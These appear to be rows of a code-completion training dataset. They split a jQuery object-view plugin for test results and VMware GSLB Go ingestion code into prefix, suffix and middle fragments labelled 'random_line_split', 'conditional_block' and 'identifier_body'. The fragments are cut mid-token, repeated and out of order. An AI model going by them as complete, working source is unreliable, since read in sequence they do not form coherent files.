},
collection:{
index: function(i,val){
return 'Тема №'+(Number(i)+1);
},
value: function(val){
return '<b>'+this.themeName+'</b> (отвечено верно <b style="color:blue">'+this.correctAns+'</b> из '+this.questCount+')';
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testQuestion = {
members:{
answers:{
label: 'Ответы',
className: 'testAnswer',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Вопрос '+(Number(i)+1);
},
value: function(val){
if(globals.godMode){
var correct = true;
for(var j in this.answers)if(this.answers[j].isCorrect!=this.answers[j].userAnswer)correct = false;
return '<span style="font-weight:700;color:'+(correct?'green':'red')+'">'+this.content+'</span>';
}else{
return this.content;
}
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testAnswer = {
members:{},
collection:{
index: function(i,val){
console.log(this);
return '<input type="'+(this.t==1?'radio':'checkbox')+'" disabled '+(this.userAnswer===1?'checked':'')+' />';
},
value: function(val){
return this.content+(globals.godMode && this.isCorrect===1?' <b style="color:green;">(правильный ответ)</b>':'');
},
defaultExpanded: false,
expandable: false
}
}
/* }}} */
/*
Function: objectView
*jQuery-plugin* отображения объекта
Parameters:
obj - Объект
className - *string* Имя класса
*/
$.fn.objectView = function(obj,className){/* {{{ */
var path;
if(typeof obj == 'string')
path = obj.split('.'); // полагаем что в ключе не может быть точки
else
path = [];
var level = path.length;
if(level==0){
var ovid = this.attr('ovid');
if(!ovid){
ovid = $.ov.views.length;
this.attr('ovid',ovid);
$.ov.views.push({
object:obj,
expanded:[]
});
}else{
$.ov.views[ovid].object = obj;
$.ov.views[ovid].expanded = [];
}
}else{
var tmp = this;
var tmp2;
ovid = this[0].parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
if(this.attr('expanded')==1){
var curlevel = this.attr('level');
tmp = tmp.next('tr');
while(true){
if(tmp.attr('level')<=curlevel || tmp.size()==0)break;
tmp2 = tmp.next('tr');
tmp.remove();
tmp = tmp2;
}
this.attr('expanded',0);
var pathStr = path.join('.');
var exp = $.ov.views[ovid].expanded;
for(var i in exp)if(exp[i]==pathStr)delete exp[i];
return this;
}
this.attr('expanded',1);
obj = $.ov.views[ovid];
}
var r = $.ov.objectToRows(ovid,path,className);
if(level == 0){
if(this.children('table.objectView').size()==0)
this.html('<table class="objectView" cellspacing="0"><thead><tr><th colspan="Object View"></th></tr></thead><tbody></tbody></table>');
var tbody = this.children('table.objectView tbody');
tbody.html(r);
}else{
this.after(r);
}
/* }}} */
}
$.fn.objectXView = function(obj,className){
if(!$.ov.classes[className])return false;
| var objectPlace = $('div#ov',this);
if(objectPlace.size()==0){
var initHtml = '<div id="ov" style="margin-bottom:10px;"></div>';
var t = '';
var c = '';
for(var i in cs){
var cc = $.ov.classes[cs[i]];
if(!cc)continue;
t+='<li><a href="#"><span>'+(cc.collectionTitle || i)+'</span></a></li>';
c+='<div id="'+i+'" class="tabPageUnbounded"></div>';
}
if(c!=''){
initHtml += '<div id="tabs"><ul>'+t+'</ul>'+c+'</div>';
}
this.html(initHtml).find('div#tabs').tabs();
objectPlace = $('div#ov',this);
}
objectPlace.objectView(obj,className);
var ovid = parseInt(objectPlace.attr('ovid'));
for(var i in cs){
var cn = cs[i];
if(!$.ov.classes[cn])continue;
var m = $.ov.classes[cn].members;
var t = '<table class="tab3d" cellspacing="0" cellpadding="3"><thead><tr>';
var colcount = 0;
for(var j in m){
t+='<th>'+(typeof m[j]=='object'?m[j].label:m[j])+'</th>';
colcount++;
}
t+='</tr></thead><tbody>';
var rowcount = 0;
for(var j in obj[i]){
t+='<tr>';
for(var k in m){
var v = obj[i][j][k];
if(m[k].action)
t+='<td><span class="likealink" onclick="$.ov.handleAction('+ovid+',\''+i+'\','+j+',\''+k+'\',\''+cn+'\')">'+v+'</span></td>';
else
t+='<td>'+v+'</td>';
}
t+='</tr>';
rowcount++;
}
if(rowcount==0)t+='<tr><td colspan="'+colcount+'" style="padding:50px;"><center>нет данных</center></td></tr>';
t+='</tbody></table>';
this.find('#tabs #'+i).html(t);
}
}; | var cs = $.ov.classes[className].collections;
| random_line_split |
1602.object_view.js | /*
Structure: objectView
*/
$.ov = {
views:[],
objectMemberValue: function(x){/* {{{ */
var val;
switch(typeof x){
case 'boolean':
val = '<input type="checkbox" '+(x?'checked ':'')+'/>';
break;
case 'number':
val = '<pre style="color:blue">'+x+'</pre>';
break;
case 'string':
val = '<pre style="color:red;max-height:300px;overflow:auto;">"'+String(x).substr(0,50).replace(/</g,'<')+'"</pre>';
break;
case 'function':
val = 'function';
break;
default:
case 'object':
val = x;
break;
}
return val;
/* }}} */
},
objectToRows: function(ovid,path,className){/* {{{ */
var level = path.length;
var pathStr = path.join('.');
var view = this.views[ovid];
var obj = view.object;
var exp = view.expanded;
for(var i in path)obj = obj[path[i]];
var r = '';
if(typeof className == 'undefined')className = obj.className;
var cl = this.classes[className];
var isCollection =
(obj.constructor==Array)
||
(typeof obj == 'object' && cl && cl.collection && cl.collection.exceptedIndex && !obj[cl.collection.exceptedIndex]);
if(cl && !isCollection){ // в объектной модели нашлось описание класса объекта и объект не коллекция
for(var i in cl.members){
var x = obj[i];
var mem = cl.members[i];
if(typeof x == 'undefined' && !mem.calculated){
if(mem.notNull || typeof mem.editing == 'undefined'){
if(/^_{2}[a-z]$/.test(i)){
r+='<tr><th colspan="2">'+mem+'</th></tr>';
}
continue;
}
x = mem.editing.defaultValue;
}
var newPathStr = pathStr+(level>0?'.':'')+i;
var label = i;
var value = x;
// Редактируем в случае если для класса обозначена редактируемость
// и для члена она не запрещена
// или для члена разрешена редактируемость и для класса она не запрещена
// и при этом если член - объект и для него задан объект редактирования
if(
(
(cl.editing && !(mem.editing===false))
||
(!cl.editing && mem.editing)
)&&(
!(typeof x == 'object' && typeof mem.editing != 'object')
)
){ // Edit
var type = (mem.editing&&mem.editing.type)?mem.editing.type:mem.editing;
switch(type){
case 'textarea':
value = '<textarea path="'+newPathStr+'" rows="'+(mem.editing&&mem.editing.rows?mem.editing.rows:3)+'" onblur="$.ov.saveValue(this);">'+String(x).replace(/</g,'<')+'</textarea>';
break;
case 'password':
case 'text':
default:
value = '<input type="'+(type=='password'?type:'text')+'" path="'+newPathStr+'" value="'+String(x).replace(/\"/g,'"').replace(/[\n\r]/,"")+'" onblur="$.ov.saveValue(this);" />';
break;
case 'select':
var opts = '';
for(var i in mem.editing.opts){
opts+='<option '+(x==mem.editing.opts[i]?'selected':'')+'>'+mem.editing.opts[i]+'</option>';
}
value = '<select path="'+newPathStr+'" onchange="$.ov.saveValue(this);">'+opts+'</select>';
break;
}
}else{ // Readonly
var c = $.ov.classes[mem.className];
if(typeof mem.asString == 'function'){
value = mem.asString.apply(obj,[x]);
}else if(c){
if(c.collection && typeof c.collection.value == 'function')
value = $.ov.cl | ',\''+mem.className+'\'':'')+')"';
var is_levelup = false;
if(typeof x == 'object')for(var xxx in x){is_levelup = true; break;}
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || mem.defaultExpanded);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(mem.className?'iclass="'+mem.className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+value+'</td></tr>';
// Рекурсивно вычисляем развернутых потомков
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),mem.className);
}
}else{ // не удалось найти описание объекта, либо объект - коллекция
for(var i in obj){
try{
var x = obj[i];
}catch(e){
continue;
}
var defExp = false;
if(cl && isCollection){
var vis = cl.collection.visible;
if(typeof vis == 'function' && !vis(i,obj[i]))continue;
var label = typeof cl.collection.index == 'function'?cl.collection.index.apply(obj[i],[i,obj[i]]):i;
var val = typeof cl.collection.value == 'function'?cl.collection.value.apply(obj[i]):obj[i];
var is_levelup = (typeof cl.collection.expandable == 'undefined' && typeof x == 'object')?true:!!cl.collection.expandable;
defExp = !!cl.collection.defaultExpanded;
}else{
var label = i;
var val = this.objectMemberValue(x);
var is_levelup = false;
if(typeof x != 'string')for(var xxx in x){is_levelup = true; break;}
}
var newPathStr = pathStr+(level>0?'.':'')+i;
var levelup = ' onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(cl?',\''+className+'\'':'')+')"';
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || defExp);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(cl?'iclass="'+className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+val+'</td></tr>';
// Рекурсивно вычисляем развернутых потомков
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),(cl?className:void(0)));
}
}
if(r=='')r='<tr level="'+level+'"><td class="ovColMain" style="padding-left:'+(15*level)+'px">empty</td><td class="ovColumn">empty</td></tr>';
// Отметить вершину как "expanded"
if(level>0)exp.push(pathStr);
return r;
/* }}} */
},
saveValue: function(el){/* {{{ */
var tag = el.tagName.toLowerCase();
switch(tag){
case 'select':
case 'textarea':
case 'input':
// Прекращаем работу функции, если ничего не изменилось
if(tag !='select' && el.defaultValue==el.value)return;
// Выходим на объект и его значение
var ovid = el.parentNode.parentNode.parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
var obj = $.ov.views[ovid].object;
var path = el.attributes.path.nodeValue.split('.');
var last = path.pop();
for(var i in path)obj = obj[path[i]];
// Сохраняем значение в объекте
el.defaultValue = el.value;
obj[last] = el.value;
// Обновляем родителя (если есть)
var tr = el.parentNode.parentNode;
var curLevel = Number(tr.attributes.level.nodeValue);
var sibling = tr.previousSibling;
if(curLevel>0){
while(sibling && Number(sibling.attributes.level.nodeValue)==curLevel)
sibling=sibling.previousSibling;
}
if(sibling){ // Нашли строку таблицы, содержащую родителя
var cl = $.ov.classes[sibling.attributes.iclass.nodeValue];
sibling.childNodes[1].innerHTML = typeof cl.collection.value == 'function'?cl.collection.value(obj):obj;
}
break;
break;
}
/* }}} */
},
handleAction: function(ovid,path,index,field,className){
$.ov.classes[className].members[field].action.apply($.ov.views[ovid].object[path][index]);
},
classes:{}
};
/* {{{ */
$.ov.classes.userTesting = {
members:{
subject: 'Предмет',
script: 'Сценарий',
userName: 'Тестируемый',
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
attempts: {
label: 'Попытки',
asString: function(x){
var n = x.length;
if(n%10>4 || n%10==0 || (n>10 && n<20)) return n+' попыток';
if(n%10==1) return n+' попытка';
return n+' попытки';
},
className: 'testAttempt',
defaultExpanded: true
}
}
};
$.ov.classes.testAttempt= {
members:{
timeBegin: {
label:'Открыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
timeEnd: {
label:'Закрыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
themes: {
label: 'Заданные вопросы',
className: 'testTheme',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Попытка №'+(Number(i)+1);
},
value: function(){
return (Math.round(Number(this.result)*10)/10)+'%';
},
defaultExpanded: true,
expandable: true
}
};
$.ov.classes.testTheme = {
members:{
themeName: 'Название',
questCount: 'Кол-во вопросов',
correctAns: 'Отвечено верно',
result: {
calculated: true,
label: 'Результат по теме',
asString: function(){return Math.round((this.correctAns/this.questCount)*1000)/10+'%';}
},
questions: {
label: 'Вопросы темы',
className: 'testQuestion',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection:{
index: function(i,val){
return 'Тема №'+(Number(i)+1);
},
value: function(val){
return '<b>'+this.themeName+'</b> (отвечено верно <b style="color:blue">'+this.correctAns+'</b> из '+this.questCount+')';
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testQuestion = {
members:{
answers:{
label: 'Ответы',
className: 'testAnswer',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Вопрос '+(Number(i)+1);
},
value: function(val){
if(globals.godMode){
var correct = true;
for(var j in this.answers)if(this.answers[j].isCorrect!=this.answers[j].userAnswer)correct = false;
return '<span style="font-weight:700;color:'+(correct?'green':'red')+'">'+this.content+'</span>';
}else{
return this.content;
}
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testAnswer = {
members:{},
collection:{
index: function(i,val){
console.log(this);
return '<input type="'+(this.t==1?'radio':'checkbox')+'" disabled '+(this.userAnswer===1?'checked':'')+' />';
},
value: function(val){
return this.content+(globals.godMode && this.isCorrect===1?' <b style="color:green;">(правильный ответ)</b>':'');
},
defaultExpanded: false,
expandable: false
}
}
/* }}} */
/*
Function: objectView
*jQuery-plugin* отображения объекта
Parameters:
obj - Объект
className - *string* Имя класса
*/
$.fn.objectView = function(obj,className){/* {{{ */
var path;
if(typeof obj == 'string')
path = obj.split('.'); // полагаем что в ключе не может быть точки
else
path = [];
var level = path.length;
if(level==0){
var ovid = this.attr('ovid');
if(!ovid){
ovid = $.ov.views.length;
this.attr('ovid',ovid);
$.ov.views.push({
object:obj,
expanded:[]
});
}else{
$.ov.views[ovid].object = obj;
$.ov.views[ovid].expanded = [];
}
}else{
var tmp = this;
var tmp2;
ovid = this[0].parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
if(this.attr('expanded')==1){
var curlevel = this.attr('level');
tmp = tmp.next('tr');
while(true){
if(tmp.attr('level')<=curlevel || tmp.size()==0)break;
tmp2 = tmp.next('tr');
tmp.remove();
tmp = tmp2;
}
this.attr('expanded',0);
var pathStr = path.join('.');
var exp = $.ov.views[ovid].expanded;
for(var i in exp)if(exp[i]==pathStr)delete exp[i];
return this;
}
this.attr('expanded',1);
obj = $.ov.views[ovid];
}
var r = $.ov.objectToRows(ovid,path,className);
if(level == 0){
if(this.children('table.objectView').size()==0)
this.html('<table class="objectView" cellspacing="0"><thead><tr><th colspan="Object View"></th></tr></thead><tbody></tbody></table>');
var tbody = this.children('table.objectView tbody');
tbody.html(r);
}else{
this.after(r);
}
/* }}} */
}
$.fn.objectXView = function(obj,className){
if(!$.ov.classes[className])return false;
var cs = $.ov.classes[className].collections;
var objectPlace = $('div#ov',this);
if(objectPlace.size()==0){
var initHtml = '<div id="ov" style="margin-bottom:10px;"></div>';
var t = '';
var c = '';
for(var i in cs){
var cc = $.ov.classes[cs[i]];
if(!cc)continue;
t+='<li><a href="#"><span>'+(cc.collectionTitle || i)+'</span></a></li>';
c+='<div id="'+i+'" class="tabPageUnbounded"></div>';
}
if(c!=''){
initHtml += '<div id="tabs"><ul>'+t+'</ul>'+c+'</div>';
}
this.html(initHtml).find('div#tabs').tabs();
objectPlace = $('div#ov',this);
}
objectPlace.objectView(obj,className);
var ovid = parseInt(objectPlace.attr('ovid'));
for(var i in cs){
var cn = cs[i];
if(!$.ov.classes[cn])continue;
var m = $.ov.classes[cn].members;
var t = '<table class="tab3d" cellspacing="0" cellpadding="3"><thead><tr>';
var colcount = 0;
for(var j in m){
t+='<th>'+(typeof m[j]=='object'?m[j].label:m[j])+'</th>';
colcount++;
}
t+='</tr></thead><tbody>';
var rowcount = 0;
for(var j in obj[i]){
t+='<tr>';
for(var k in m){
var v = obj[i][j][k];
if(m[k].action)
t+='<td><span class="likealink" onclick="$.ov.handleAction('+ovid+',\''+i+'\','+j+',\''+k+'\',\''+cn+'\')">'+v+'</span></td>';
else
t+='<td>'+v+'</td>';
}
t+='</tr>';
rowcount++;
}
if(rowcount==0)t+='<tr><td colspan="'+colcount+'" style="padding:50px;"><center>нет данных</center></td></tr>';
t+='</tbody></table>';
this.find('#tabs #'+i).html(t);
}
};
| asses[mem.className].collection.value.apply(x);
}
}
if(typeof mem == 'string'){
label = mem;
}else if(typeof mem == 'object' && mem.label){
label = mem.label;
}
var levelup = 'class="likealink" onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(mem.className? | conditional_block |
dq_ingestion.go | /*
* Copyright 2019-2020 VMware, Inc.
* All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package nodes
import (
"errors"
"sync"
"github.com/davecgh/go-spew/spew"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/gslbutils"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/k8sobjects"
"github.com/vmware/load-balancer-and-ingress-services-for-kubernetes/pkg/utils"
)
func DeriveGSLBServiceName(hostname string) string {
// This function is a place-holder for deriving the GSLB service name
// For now, the hostname of a route is the GSLB Service name
return hostname
}
func PublishKeyToRestLayer(tenant, gsName, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occured while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func getObjFromStore(objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) |
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) {
gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return
}
switch objectOperation {
case gslbutils.ObjectAdd:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
case gslbutils.ObjectDelete:
deleteObjOperation(key, cname, ns, objType, objName, sharedQueue)
case gslbutils.ObjectUpdate:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
}
}
func SyncFromIngestionLayer(key string, wg *sync.WaitGroup) error {
DequeueIngestion(key)
return nil
}
| {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
} | identifier_body |
dq_ingestion.go | /*
* Copyright 2019-2020 VMware, Inc.
* All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package nodes
import (
"errors"
"sync"
"github.com/davecgh/go-spew/spew"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/gslbutils"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/k8sobjects"
"github.com/vmware/load-balancer-and-ingress-services-for-kubernetes/pkg/utils"
)
func DeriveGSLBServiceName(hostname string) string {
// This function is a place-holder for deriving the GSLB service name
// For now, the hostname of a route is the GSLB Service name
return hostname
}
func PublishKeyToRestLayer(tenant, gsName, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occured while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func getObjFromStore(objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
